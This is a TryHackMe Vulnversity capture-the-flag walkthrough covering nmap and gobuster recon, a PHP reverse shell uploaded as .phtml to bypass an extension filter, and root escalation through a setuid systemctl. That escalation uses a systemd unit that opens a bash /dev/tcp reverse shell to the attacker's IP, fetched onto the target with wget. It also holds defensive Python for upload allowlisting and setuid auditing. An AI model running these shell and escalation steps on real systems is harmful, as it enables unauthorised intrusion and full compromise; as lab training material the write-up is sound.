TryHackMe: Vulnversity Writeup
The TryHackMe Vulnversity room is designed for foundational learning in reconnaissance, web application attacks, and straightforward privilege escalation techniques.
To access the box, click on the following link and join the room.
Check connection
Ping the machine IP to check whether the connection is established. In my case the ping is successful, so the connection is established.
Scanning
Let’s start with an nmap scan. Use the following command to scan the target IP address.
nmap -sV 10.10.55.131
The above command scans the target to discover open ports and determine the versions of the services running on those ports.
nmap is the command-line utility used for network exploration and security auditing.
-sV instructs nmap to perform a service version detection scan: it attempts to determine the versions of the services running on the target ports, identifying the specific software and its version behind each open port on the target machine.
10.10.55.131 is the IP address of the target system that nmap will scan for open ports and service versions.
Based on these results, let’s answer the questions in the Reconnaissance part on TryHackMe.
Visit the target IP
The nmap scan results show that an HTTP service is running on port 3333, so let’s visit the target IP address on port 3333 in a browser.
The target IP on port 3333 shows a website of some university.
Directory Busting
Let’s start directory busting with gobuster. Use the following command for directory busting.
gobuster dir -u http://10.10.159.61:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
The purpose of the above command is to perform a directory brute-force attack on the target web server on port 3333, attempting to discover hidden or unlinked directories or files by trying the entries in the specified wordlist.
gobuster dir specifies that the gobuster tool will perform a directory brute-force attack.
-u http://10.10.159.61:3333 specifies the target URL to scan.
-w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt specifies the wordlist to use for the brute-force attack; it contains a list of common directory and file names that gobuster will attempt to access on the target URL.
The directory busting results show a few directories. Let’s check them one by one.
We found an upload directory where we can upload files.
Now, let’s brute-force directories under /internal to find the path where uploaded files are stored.
gobuster dir -u http://10.10.241.44:3333/internal -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 100
The above command performs a directory brute-force attack specifically on the /internal directory of the target web server running on port 3333, trying to identify hidden or unlinked directories or files within that directory using the specified wordlist.
gobuster dir specifies that gobuster will perform a directory brute-force attack.
-u http://10.10.241.44:3333/internal specifies the target URL to scan.
-w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt specifies the wordlist to use for the brute-force attack; it contains a list of common directory and file names that gobuster will attempt to access within the /internal directory.
-t 100 specifies the number of concurrent threads to use. Here it is set to 100, which means gobuster will use 100 threads simultaneously, potentially speeding up the brute-force.
Boom! We found the uploads directory, where the uploaded scripts or files can be found.
Compromising Web Server
We have found the page where we can upload files. So, let’s upload a txt file and intercept it in Burp Suite.
From the captured POST request in Burp Suite we can see that the target web server is using PHP. So, we can use a PHP script to compromise the web server. You can download the reverse shell script from the following GitHub link.
Change the IP and port to those on which you want to start the listener. In my case I chose port 3344.
Save the script as reverseshell.php and upload it to the target web server.
We got an error message on uploading the .php file, which means that files with a .php extension are not allowed. Let’s change the extension of the script from .php to .phtml and try uploading again.
On uploading the .phtml script we got a success message, which means the script was uploaded successfully.
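The upload form rejects .php but accepts .phtml, which Apache’s PHP handler executes just the same. The following added example (not code from the room or from the writeup’s author) models that blocklist check beside an allowlist-based check that a defender would use instead; the extension sets and function names are assumptions for illustration.

```python
import os
import secrets
from typing import Optional

# Extension blocklist that mirrors what the room's upload form does:
# only ".php" is rejected, so ".phtml" slips through.
BLOCKED_EXTENSIONS = {".php"}

def blocklist_allows(filename: str) -> bool:
    """Weak check: reject only the extensions we happened to think of."""
    _, ext = os.path.splitext(filename)
    return ext.lower() not in BLOCKED_EXTENSIONS

# Hardened alternative: an allowlist of non-executable types (assumed set),
# applied to the whole basename so that only one extension is present.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".txt", ".pdf"}

def allowlist_allows(filename: str) -> bool:
    """Strong check: accept only known-harmless extensions, and require
    the name to consist of exactly a stem plus one allowed extension."""
    base = os.path.basename(filename).lower()
    parts = base.split(".")
    if len(parts) != 2 or not parts[0]:
        return False  # no extension, hidden file, or multiple extensions
    return "." + parts[1] in ALLOWED_EXTENSIONS

def stored_name(filename: str) -> Optional[str]:
    """Return a server-chosen name to save the file under, or None if the
    upload is rejected. The client-supplied name is never used on disk."""
    if not allowlist_allows(filename):
        return None
    ext = "." + os.path.basename(filename).rsplit(".", 1)[1].lower()
    return secrets.token_hex(16) + ext

if __name__ == "__main__":
    for name in ("reverseshell.php", "reverseshell.phtml", "notes.txt"):
        print(name, "blocklist:", blocklist_allows(name),
              "allowlist:", allowlist_allows(name))
```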
Setting up listener
Start a listener in the terminal to capture the reverse shell. Use the following command:
nc -lvp 3344
nc is the command used to work with network connections, commonly known as netcat.
-l tells nc to listen for incoming connections.
-v enables verbose mode, giving more detailed output about the connections.
-p 3344 specifies the port number (3344) to listen on for incoming connections.
Getting reverse shell
We found the /uploads/ directory on the target IP during directory busting. Now, let’s go to that path and execute the reverse shell script.
We found our uploaded reverseshell.phtml script on the web server. Right-click, open it in a new tab, and the script will be executed.
“Boom! Access granted. Congratulations on the achievement!”
Get user flag
Now, let’s find the user flag. Before that, let’s enumerate the users with the following command
cat /etc/passwd
We found a user named bill with a home directory. Let’s enter bill’s home directory with the cd command and list the files there.
We found the user.txt file. Let’s view the contents of user.txt with the cat command and capture the user flag.
Answer the questions in the TryHackMe room and submit.
Privilege Escalation
To escalate privileges we can identify setuid programs owned by the root user; these are potential security risks, because a vulnerability in such a program can let an unprivileged user gain elevated privileges. Let’s use the find command to locate those programs.
find / -user root -perm -4000 -print 2>/dev/null
find initiates the search command.
/ specifies the starting point of the search: the root directory.
-user root searches for files owned by the user root.
-perm -4000 looks for files with the setuid bit set, that is, files whose permission bits include 4000 (setuid for the owner).
-print prints the location of each file that matches the criteria.
2>/dev/null redirects error messages (stderr) to /dev/null, a special device file that discards data, so that permission errors encountered during the search are not displayed on the terminal.
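Reviewing the find output by eye works on a CTF box, but on a real host the useful question is which setuid-root binaries are not supposed to be there. The added example below (not part of the writeup) diffs such a list against an assumed baseline of setuid-root binaries that are normal on a stock Debian/Ubuntu install; the sample find output is constructed and includes the systemctl entry this room’s host turns up.

```python
import os
import stat
from typing import Iterable, List

# Assumed baseline: setuid-root binaries expected on a stock Debian/Ubuntu
# host. A real audit would derive this from a known-good image or the
# distribution's package manifests rather than a hand-written set.
EXPECTED_SETUID_ROOT = {
    "/bin/su", "/bin/ping", "/bin/mount", "/bin/umount", "/bin/fusermount",
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/pkexec",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/openssh/ssh-keysign",
}

def unexpected_setuid(found_paths: Iterable[str]) -> List[str]:
    """Return the paths from `find / -user root -perm -4000` output that are
    not in the baseline, sorted for stable reporting."""
    found = {p.strip() for p in found_paths if p.strip()}
    return sorted(found - EXPECTED_SETUID_ROOT)

def is_setuid_root(path: str) -> bool:
    """Live check of one file: a regular file owned by uid 0 with the setuid
    bit set. Symlinks are not followed, so a link to such a file is False."""
    try:
        st = os.lstat(path)
    except OSError:
        return False
    return (stat.S_ISREG(st.st_mode) and st.st_uid == 0
            and bool(st.st_mode & stat.S_ISUID))

# Constructed sample output, modelled on the room's host.
SAMPLE_FIND_OUTPUT = """\
/bin/mount
/bin/ping
/bin/su
/bin/umount
/bin/systemctl
/usr/bin/passwd
/usr/bin/sudo
"""

if __name__ == "__main__":
    for p in unexpected_setuid(SAMPLE_FIND_OUTPUT.splitlines()):
        print("unexpected setuid-root binary:", p, "(live:", is_setuid_root(p), ")")
```

On a live system, feed the real find output in and confirm each flagged path with is_setuid_root before raising an alert.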
We found that /bin/systemctl has the setuid bit and is susceptible to exploitation, so let’s abuse it to escalate privileges from a regular user to root, potentially compromising the entire system. It is not common for the systemctl binary to have that kind of permission. We can create our own service to get a reverse shell. Let’s do it by opening the nano editor in the terminal.
I just created a simple root service to escalate privileges, as shown in the image below. You can copy the code below; don’t forget to change the IP and port number for the listener.
[Unit]
Description=root
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.6.114.60/5555 0>&1'
[Install]
WantedBy=multi-user.target
Press Ctrl+X, press Y, and hit Enter to save and exit the nano editor. Let’s check with the ls command that the file is there.
Starting HTTP server
Now, let’s start a simple Python HTTP server in the current directory so we can download the malicious service onto the target system. Use the following Python command to start the HTTP server.
python -m http.server 80
Downloading malicious service on target system
Let’s move to the /tmp directory on the target system and download our malicious service there. By default, all users have write permission on /tmp, allowing them to create, modify, and delete files within it. Use the following wget command to download the file.
wget http://10.6.114.60/root.service
Let’s verify with the ls command that the service was downloaded.
Let’s enable the service with the following command
systemctl enable /tmp/root.service
The above command attempts to enable a service called root.service located in the /tmp directory.
Starting listener
Now that we are all set to exploit the target, let’s start the listener on our machine with the following command.
nc -lvp 5555
Starting service
Now, let’s start the malicious service with the following command
systemctl start root
Reverse shell
As soon as the service executes, we get the reverse shell in the terminal.
Let’s list the files and directories with the ls command.
We found a root directory. Let’s change the current directory to root and list the files there.
Get root flag
We got our desired root.txt file. Let’s capture the root flag with the cat command.
Copy and paste the flag into TryHackMe.
CONGRATULATIONS!!! The room is completed!
This walkthrough finishes here. Stay tuned for the next adventure! 🚀😊